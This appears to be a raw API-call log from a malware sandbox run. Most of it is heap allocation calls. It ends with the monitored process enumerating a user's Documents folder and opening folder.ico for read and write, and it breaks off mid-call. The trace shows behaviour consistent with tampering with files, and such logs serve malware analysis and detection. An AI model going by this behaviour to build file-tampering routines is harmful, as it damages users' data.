0x3466428 [0238.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0238.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.788] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="_private\\" [0238.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c43c0 [0238.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.788] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0238.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d258 [0238.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c43c0 | out: hHeap=0x620000) returned 1 [0238.788] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0238.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b861b0 [0238.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d258 | out: hHeap=0x620000) returned 1 [0238.788] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0238.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b861b0 | out: hHeap=0x620000) returned 1 [0238.788] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.788] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.788] PathFindFileNameW (pszPath="") returned="" [0238.788] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0238.790] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.790] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0238.790] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned=".ico" [0238.790] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.792] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=29926) returned 1 [0238.792] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.795] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x74c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 